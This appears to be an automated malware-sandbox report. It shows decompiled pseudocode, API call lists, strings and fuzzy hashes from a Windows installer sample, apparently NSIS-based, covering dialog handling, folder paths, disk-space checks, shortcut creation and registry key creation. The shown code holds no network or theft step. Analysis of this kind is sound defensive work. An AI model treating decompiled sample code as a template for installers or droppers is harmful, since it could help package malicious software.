                                          				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
                                          				_t127 = GetDlgItem(_a4, 0x3f8);
                                          				 *0x42e344 = _t127;
                                          				_v8 = _t127;
                                          				E00403D12( *0x42e330);
                                          				 *0x42e334 = E0040456B(4);
                                          				 *0x42e34c = 0;
                                          				GetClientRect(_v8,  &_v28);
                                          				_v52 = _v28.right - GetSystemMetrics(0x15);
                                          				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                          				if(_a8 >= 0) {
                                          					SendMessageA(_v8, 0x1001, 0, _a8);
                                          					SendMessageA(_v8, 0x1026, 0, _a8);
                                          				}
                                          				if(_a12 >= _t149) {
                                          					SendMessageA(_v8, 0x1024, _t149, _a12);
                                          				}
                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                          				_push(0x1b);
                                          				E00403CDD(_a4);
                                          				if(( *0x42eb78 & 0x00000003) != 0) {
                                          					ShowWindow( *0x42e330, _t149);
                                          					if(( *0x42eb78 & 0x00000002) != 0) {
                                          						 *0x42e330 = _t149;
                                          					} else {
                                          						ShowWindow(_v8, 8);
                                          					}
                                          					E00403D12( *0x42e328);
                                          				}
                                          				_t158 = GetDlgItem(_a4, 0x3ec);
                                          				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                          				if(( *0x42eb78 & 0x00000004) != 0) {
                                          					SendMessageA(_t158, 0x409, _t149, _a12);
                                          					SendMessageA(_t158, 0x2001, _t149, _a8);
                                          				}
                                          				goto L37;
                                          			}

                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 00404E66
                                          • GetDlgItem.USER32(?,000003EE), ref: 00404E75
                                          • GetClientRect.USER32 ref: 00404EB2
                                          • GetSystemMetrics.USER32 ref: 00404EBA
                                          • SendMessageA.USER32 ref: 00404EDB
                                          • SendMessageA.USER32 ref: 00404EEC
                                          • SendMessageA.USER32 ref: 00404EFF
                                          • SendMessageA.USER32 ref: 00404F0D
                                          • SendMessageA.USER32 ref: 00404F20
                                          • ShowWindow.USER32(00000000,?), ref: 00404F42
                                          • ShowWindow.USER32(?,00000008), ref: 00404F56
                                          • GetDlgItem.USER32(?,000003EC), ref: 00404F77
                                          • SendMessageA.USER32 ref: 00404F87
                                          • SendMessageA.USER32 ref: 00404FA0
                                          • SendMessageA.USER32 ref: 00404FAC
                                          • GetDlgItem.USER32(?,000003F8), ref: 00404E84
                                            • Part of subcall function 00403D12: SendMessageA.USER32 ref: 00403D20
                                          • GetDlgItem.USER32(?,000003EC), ref: 00404FC9
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004D9B,00000000), ref: 00404FD7
                                          • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                          • ShowWindow.USER32(00000000), ref: 00405002
                                          • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                          • ShowWindow.USER32(00000008), ref: 0040504E
                                          • SendMessageA.USER32 ref: 00405080
                                          • CreatePopupMenu.USER32 ref: 00405091
                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004050A6
                                          • GetWindowRect.USER32 ref: 004050B9
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                          • SendMessageA.USER32 ref: 00405118
                                          • OpenClipboard.USER32(00000000), ref: 00405128
                                          • EmptyClipboard.USER32 ref: 0040512E
                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                          • GlobalLock.KERNEL32 ref: 00405141
                                          • SendMessageA.USER32 ref: 00405155
                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                          • SetClipboardData.USER32 ref: 00405178
                                          • CloseClipboard.USER32 ref: 0040517E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                          • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                          • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                          • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				struct HWND__* _v12;
                                          				long _v16;
                                          				long _v20;
                                          				char _v24;
                                          				long _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				long _v40;
                                          				signed int _v44;
                                          				CHAR* _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				CHAR* _v68;
                                          				void _v72;
                                          				char _v76;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t81;
                                          				long _t86;
                                          				signed char* _t88;
                                          				void* _t94;
                                          				signed int _t95;
                                          				signed short _t113;
                                          				signed int _t117;
                                          				char* _t122;
                                          				intOrPtr _t124;
                                          				intOrPtr* _t138;
                                          				signed int* _t145;
                                          				intOrPtr _t147;
                                          				signed int _t148;
                                          				signed int _t153;
                                          				struct HWND__* _t159;
                                          				CHAR* _t162;
                                          				int _t163;
                                          
                                          				_t81 =  *0x4297a8;
                                          				_v36 = _t81;
                                          				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
                                          				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                          				if(_a8 == 0x40b) {
                                          					E004051D0(0x3fb, _t162);
                                          					E00405B89(_t162);
                                          				}
                                          				if(_a8 != 0x110) {
                                          					L8:
                                          					if(_a8 != 0x111) {
                                          						L20:
                                          						if(_a8 == 0x40f) {
                                          							L22:
                                          							_v8 = _v8 & 0x00000000;
                                          							_v12 = _v12 & 0x00000000;
                                          							E004051D0(0x3fb, _t162);
                                          							if(E004054FF(_t180, _t162) == 0) {
                                          								_v8 = 1;
                                          							}
                                          							E0040592B(0x428fa0, _t162);
                                          							_t145 = 0;
                                          							_t86 = E00405C49(0);
                                          							_v16 = _t86;
                                          							if(_t86 == 0) {
                                          								L31:
                                          								E0040592B(0x428fa0, _t162);
                                          								_t88 = E004054B2(0x428fa0);
                                          								if(_t88 != _t145) {
                                          									 *_t88 =  *_t88 & 0x00000000;
                                          								}
                                          								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                          									_t153 = _a8;
                                          									goto L37;
                                          								} else {
                                          									_t163 = 0x400;
                                          									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                          									_v12 = 1;
                                          									goto L38;
                                          								}
                                          							} else {
                                          								if(0 == 0x428fa0) {
                                          									L30:
                                          									_t145 = 0;
                                          									goto L31;
                                          								} else {
                                          									goto L26;
                                          								}
                                          								while(1) {
                                          									L26:
                                          									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
                                          									if(_t113 != 0) {
                                          										break;
                                          									}
                                          									if(_t145 != 0) {
                                          										 *_t145 =  *_t145 & _t113;
                                          									}
                                          									_t145 = E00405465(0x428fa0) - 1;
                                          									 *_t145 = 0x5c;
                                          									if(_t145 != 0x428fa0) {
                                          										continue;
                                          									} else {
                                          										goto L30;
                                          									}
                                          								}
                                          								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                          								_v12 = 1;
                                          								_t145 = 0;
                                          								L37:
                                          								_t163 = 0x400;
                                          								L38:
                                          								_t94 = E0040456B(5);
                                          								if(_v12 != _t145 && _t153 < _t94) {
                                          									_v8 = 2;
                                          								}
                                          								_t147 =  *0x42e33c; // 0x294de4
                                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                                          									E004044B6(0x3ff, 0xfffffffb, _t94);
                                          									if(_v12 == _t145) {
                                          										SetDlgItemTextA(_a4, _t163, 0x428f90);
                                          									} else {
                                          										E004044B6(_t163, 0xfffffffc, _t153);
                                          									}
                                          								}
                                          								_t95 = _v8;
                                          								 *0x42ec04 = _t95;
                                          								if(_t95 == _t145) {
                                          									_v8 = E0040140B(7);
                                          								}
                                          								if(( *(_v36 + 0x14) & _t163) != 0) {
                                          									_v8 = _t145;
                                          								}
                                          								E00403CFF(0 | _v8 == _t145);
                                          								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
                                          									E004040B0();
                                          								}
                                          								 *0x429fc4 = _t145;
                                          								goto L53;
                                          							}
                                          						}
                                          						_t180 = _a8 - 0x405;
                                          						if(_a8 != 0x405) {
                                          							goto L53;
                                          						}
                                          						goto L22;
                                          					}
                                          					_t117 = _a12 & 0x0000ffff;
                                          					if(_t117 != 0x3fb) {
                                          						L12:
                                          						if(_t117 == 0x3e9) {
                                          							_t148 = 7;
                                          							memset( &_v72, 0, _t148 << 2);
                                          							_v76 = _a4;
                                          							_v68 = 0x429fd8;
                                          							_v56 = E00404450;
                                          							_v52 = _t162;
                                          							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
                                          							_t122 =  &_v76;
                                          							_v60 = 0x41;
                                          							__imp__SHBrowseForFolderA(_t122);
                                          							if(_t122 == 0) {
                                          								_a8 = 0x40f;
                                          							} else {
                                          								__imp__CoTaskMemFree(_t122);
                                          								E0040541E(_t162);
                                          								_t124 =  *0x42eb70; // 0x2903c0
                                          								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                          								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
                                          									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
                                          									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
                                          										lstrcatA(_t162, 0x42db00);
                                          									}
                                          								}
                                          								 *0x429fc4 =  &(( *0x429fc4)[0]);
                                          								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                          							}
                                          						}
                                          						goto L20;
                                          					}
                                          					if(_a12 >> 0x10 != 0x300) {
                                          						goto L53;
                                          					}
                                          					_a8 = 0x40f;
                                          					goto L12;
                                          				} else {
                                          					_t159 = _a4;
                                          					_v12 = GetDlgItem(_t159, 0x3fb);
                                          					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
                                          						E0040541E(_t162);
                                          					}
                                          					 *0x42e338 = _t159;
                                          					SetWindowTextA(_v12, _t162);
                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                          					_push(1);
                                          					E00403CDD(_t159);
                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                          					_push(0x14);
                                          					E00403CDD(_t159);
                                          					E00403D12(_v12);
                                          					_t138 = E00405C49(7);
                                          					if(_t138 == 0) {
                                          						L53:
                                          						return E00403D44(_a8, _a12, _a16);
                                          					}
                                          					 *_t138(_v12, 1);
                                          					goto L8;
                                          				}
                                          			}









































                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404167
                                          • SetWindowTextA.USER32(?,?), ref: 00404194
                                          • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                          • lstrcmpiA.KERNEL32(hnahgvbse,00429FD8,00000000,?,?), ref: 00404286
                                          • lstrcatA.KERNEL32(?,hnahgvbse), ref: 00404292
                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004042A2
                                            • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BE1
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BEE
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BF3
                                            • Part of subcall function 00405B89: CharPrevA.USER32(?,?), ref: 00405C03
                                          • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                          • MulDiv.KERNEL32 ref: 00404376
                                          • SetDlgItemTextA.USER32(00000000,00000400,00428F90), ref: 004043EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                          • String ID: A$C:\Users\user\AppData\Local\Temp$hnahgvbse$M)
                                          • API String ID: 2246997448-1584715942
                                          • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                          • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                          • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                          • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                          				signed int _v8;
                                          				struct _ITEMIDLIST* _v12;
                                          				signed int _v16;
                                          				signed char _v20;
                                          				signed char _v24;
                                          				signed int _v28;
                                          				signed int _t36;
                                          				CHAR* _t37;
                                          				signed char _t39;
                                          				signed int _t40;
                                          				int _t41;
                                          				char _t51;
                                          				char _t52;
                                          				char _t54;
                                          				char _t56;
                                          				void* _t64;
                                          				signed int _t68;
                                          				intOrPtr _t72;
                                          				signed int _t73;
                                          				signed char _t74;
                                          				intOrPtr _t77;
                                          				char _t81;
                                          				void* _t83;
                                          				CHAR* _t84;
                                          				void* _t86;
                                          				signed int _t93;
                                          				signed int _t95;
                                          				void* _t96;
                                          
                                          				_t86 = __esi;
                                          				_t83 = __edi;
                                          				_t64 = __ebx;
                                          				_t36 = _a8;
                                          				if(_t36 < 0) {
                                          					_t77 =  *0x42e33c; // 0x294de4
                                          					_t36 =  *(_t77 - 4 + _t36 * 4);
                                          				}
                                          				_t72 =  *0x42eb98; // 0x2939c0
                                          				_t73 = _t72 + _t36;
                                          				_t37 = 0x42db00;
                                          				_push(_t64);
                                          				_push(_t86);
                                          				_push(_t83);
                                          				_t84 = 0x42db00;
                                          				if(_a4 - 0x42db00 < 0x800) {
                                          					_t84 = _a4;
                                          					_a4 = _a4 & 0x00000000;
                                          				}
                                          				while(1) {
                                          					_t81 =  *_t73;
                                          					if(_t81 == 0) {
                                          						break;
                                          					}
                                          					__eflags = _t84 - _t37 - 0x400;
                                          					if(_t84 - _t37 >= 0x400) {
                                          						break;
                                          					}
                                          					_t73 = _t73 + 1;
                                          					__eflags = _t81 - 0xfc;
                                          					_a8 = _t73;
                                          					if(__eflags <= 0) {
                                          						if(__eflags != 0) {
                                          							 *_t84 = _t81;
                                          							_t84 =  &(_t84[1]);
                                          							__eflags = _t84;
                                          						} else {
                                          							 *_t84 =  *_t73;
                                          							_t84 =  &(_t84[1]);
                                          							_t73 = _t73 + 1;
                                          						}
                                          						continue;
                                          					}
                                          					_t39 =  *(_t73 + 1);
                                          					_t74 =  *_t73;
                                          					_a8 = _a8 + 2;
                                          					_v20 = _t39;
                                          					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                                          					_t68 = _t74;
                                          					_t40 = _t39 | 0x00000080;
                                          					__eflags = _t81 - 0xfe;
                                          					_v28 = _t68;
                                          					_v24 = _t74 | 0x00000080;
                                          					_v16 = _t40;
                                          					if(_t81 != 0xfe) {
                                          						__eflags = _t81 - 0xfd;
                                          						if(_t81 != 0xfd) {
                                          							__eflags = _t81 - 0xff;
                                          							if(_t81 == 0xff) {
                                          								__eflags = (_t40 | 0xffffffff) - _t93;
                                          								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                                          							}
                                          							L41:
                                          							_t41 = lstrlenA(_t84);
                                          							_t73 = _a8;
                                          							_t84 =  &(_t84[_t41]);
                                          							_t37 = 0x42db00;
                                          							continue;
                                          						}
                                          						__eflags = _t93 - 0x1d;
                                          						if(_t93 != 0x1d) {
                                          							__eflags = (_t93 << 0xa) + 0x42f000;
                                          							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
                                          						} else {
                                          							E00405889(_t84,  *0x42eb68);
                                          						}
                                          						__eflags = _t93 + 0xffffffeb - 7;
                                          						if(_t93 + 0xffffffeb < 7) {
                                          							L32:
                                          							E00405B89(_t84);
                                          						}
                                          						goto L41;
                                          					}
                                          					_t95 = 2;
                                          					_t51 = GetVersion();
                                          					__eflags = _t51;
                                          					if(_t51 >= 0) {
                                          						L12:
                                          						_v8 = 1;
                                          						L13:
                                          						__eflags =  *0x42ebe4;
                                          						if( *0x42ebe4 != 0) {
                                          							_t95 = 4;
                                          						}
                                          						__eflags = _t68;
                                          						if(_t68 >= 0) {
                                          							__eflags = _t68 - 0x25;
                                          							if(_t68 != 0x25) {
                                          								__eflags = _t68 - 0x24;
                                          								if(_t68 == 0x24) {
                                          									GetWindowsDirectoryA(_t84, 0x400);
                                          									_t95 = 0;
                                          								}
                                          								while(1) {
                                          									__eflags = _t95;
                                          									if(_t95 == 0) {
                                          										goto L29;
                                          									}
                                          									_t52 =  *0x42eb64; // 0x74951528
                                          									_t95 = _t95 - 1;
                                          									__eflags = _t52;
                                          									if(_t52 == 0) {
                                          										L25:
                                          										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                                          										__eflags = _t54;
                                          										if(_t54 != 0) {
                                          											L27:
                                          											 *_t84 =  *_t84 & 0x00000000;
                                          											__eflags =  *_t84;
                                          											continue;
                                          										}
                                          										__imp__SHGetPathFromIDListA(_v12, _t84);
                                          										__imp__CoTaskMemFree(_v12);
                                          										__eflags = _t54;
                                          										if(_t54 != 0) {
                                          											goto L29;
                                          										}
                                          										goto L27;
                                          									}
                                          									__eflags = _v8;
                                          									if(_v8 == 0) {
                                          										goto L25;
                                          									}
                                          									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                                          									__eflags = _t56;
                                          									if(_t56 == 0) {
                                          										goto L29;
                                          									}
                                          									goto L25;
                                          								}
                                          								goto L29;
                                          							}
                                          							GetSystemDirectoryA(_t84, 0x400);
                                          							goto L29;
                                          						} else {
                                          							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
                                          							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
                                          							__eflags =  *_t84;
                                          							if( *_t84 != 0) {
                                          								L30:
                                          								__eflags = _v20 - 0x1a;
                                          								if(_v20 == 0x1a) {
                                          									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                          								}
                                          								goto L32;
                                          							}
                                          							E0040594D(_t71, _t84, _t95, _t84, _v20);
                                          							L29:
                                          							__eflags =  *_t84;
                                          							if( *_t84 == 0) {
                                          								goto L32;
                                          							}
                                          							goto L30;
                                          						}
                                          					}
                                          					__eflags = _t51 - 0x5a04;
                                          					if(_t51 == 0x5a04) {
                                          						goto L12;
                                          					}
                                          					__eflags = _v20 - 0x23;
                                          					if(_v20 == 0x23) {
                                          						goto L12;
                                          					}
                                          					__eflags = _v20 - 0x2e;
                                          					if(_v20 == 0x2e) {
                                          						goto L12;
                                          					} else {
                                          						_v8 = _v8 & 0x00000000;
                                          						goto L13;
                                          					}
                                          				}
                                          				 *_t84 =  *_t84 & 0x00000000;
                                          				if(_a4 == 0) {
                                          					return _t37;
                                          				}
                                          				return E0040592B(_a4, _t37);
                                          			}


                                          APIs
                                          • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                          • GetSystemDirectoryA.KERNEL32(hnahgvbse,00000400), ref: 00405A6C
                                          • GetWindowsDirectoryA.KERNEL32(hnahgvbse,00000400), ref: 00405A7F
                                          • SHGetSpecialFolderLocation.SHELL32(?,0041FA6B), ref: 00405ABB
                                          • SHGetPathFromIDListA.SHELL32(0041FA6B,hnahgvbse), ref: 00405AC9
                                          • CoTaskMemFree.OLE32(0041FA6B), ref: 00405AD4
                                          • lstrcatA.KERNEL32(hnahgvbse,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                          • lstrlenA.KERNEL32(hnahgvbse,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hnahgvbse$M)
                                          • API String ID: 900638850-2847218805
                                          • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                          • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                          • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                          • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 10001008
                                          • HeapAlloc.KERNEL32(00000000), ref: 1000100F
                                          • RegCreateKeyExW.ADVAPI32(80000002,10000000,00000000,00000000,00000000,0002001F,00000000,-00000007,00000000), ref: 10001058
                                          • GetProcessHeap.KERNEL32(00000000,00000001), ref: 10001068
                                          • HeapFree.KERNEL32(00000000), ref: 1000106F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Heap$Process$AllocCreateFree
                                          • String ID: returning %p
                                          • API String ID: 3034372947-1981732286
                                          • Opcode ID: bef14ff329170a341c7337b66d028bd12022a910616ff29065d26573c307885f
                                          • Instruction ID: f5aada24cf31a5d2b5df8315e8a027717e97e26d3c403dfb97c55b0d34e31b78
                                          • Opcode Fuzzy Hash: bef14ff329170a341c7337b66d028bd12022a910616ff29065d26573c307885f
                                          • Instruction Fuzzy Hash: 0D118078640248FFF710CF94CD49FA977B9EB49741F208048FA04AB391C6B5EE809B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E00402012() {
                                          				void* _t44;
                                          				intOrPtr* _t48;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				intOrPtr* _t54;
                                          				signed int _t58;
                                          				intOrPtr* _t59;
                                          				intOrPtr* _t62;
                                          				intOrPtr* _t64;
                                          				intOrPtr* _t66;
                                          				intOrPtr* _t69;
                                          				intOrPtr* _t71;
                                          				int _t75;
                                          				signed int _t81;
                                          				intOrPtr* _t88;
                                          				void* _t95;
                                          				void* _t96;
                                          				void* _t100;
                                          
                                          				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                                          				_t96 = E004029E8(0xffffffdf);
                                          				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                                          				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                                          				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                                          				if(E0040548B(_t96) == 0) {
                                          					E004029E8(0x21);
                                          				}
                                          				_t44 = _t100 + 8;
                                          				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
                                          				if(_t44 < _t75) {
                                          					L13:
                                          					 *((intOrPtr*)(_t100 - 4)) = 1;
                                          					_push(0xfffffff0);
                                          				} else {
                                          					_t48 =  *((intOrPtr*)(_t100 + 8));
                                          					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
                                          					if(_t95 >= _t75) {
                                          						_t52 =  *((intOrPtr*)(_t100 + 8));
                                          						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                          						_t54 =  *((intOrPtr*)(_t100 + 8));
                                          						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
                                          						_t81 =  *(_t100 - 0x14);
                                          						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                          						if(_t58 != 0) {
                                          							_t88 =  *((intOrPtr*)(_t100 + 8));
                                          							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                          							_t81 =  *(_t100 - 0x14);
                                          						}
                                          						_t59 =  *((intOrPtr*)(_t100 + 8));
                                          						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                          						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                          							_t71 =  *((intOrPtr*)(_t100 + 8));
                                          							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                          						}
                                          						_t62 =  *((intOrPtr*)(_t100 + 8));
                                          						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                          						_t64 =  *((intOrPtr*)(_t100 + 8));
                                          						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                          						if(_t95 >= _t75) {
                                          							_t95 = 0x80004005;
                                          							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
                                          								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                          								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
                                          							}
                                          						}
                                          						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                          						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                          					}
                                          					_t50 =  *((intOrPtr*)(_t100 + 8));
                                          					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                          					if(_t95 >= _t75) {
                                          						_push(0xfffffff4);
                                          					} else {
                                          						goto L13;
                                          					}
                                          				}
                                          				E00401423();
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
                                          				return 0;
                                          			}


                                          APIs
                                          • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?), ref: 00402065
                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
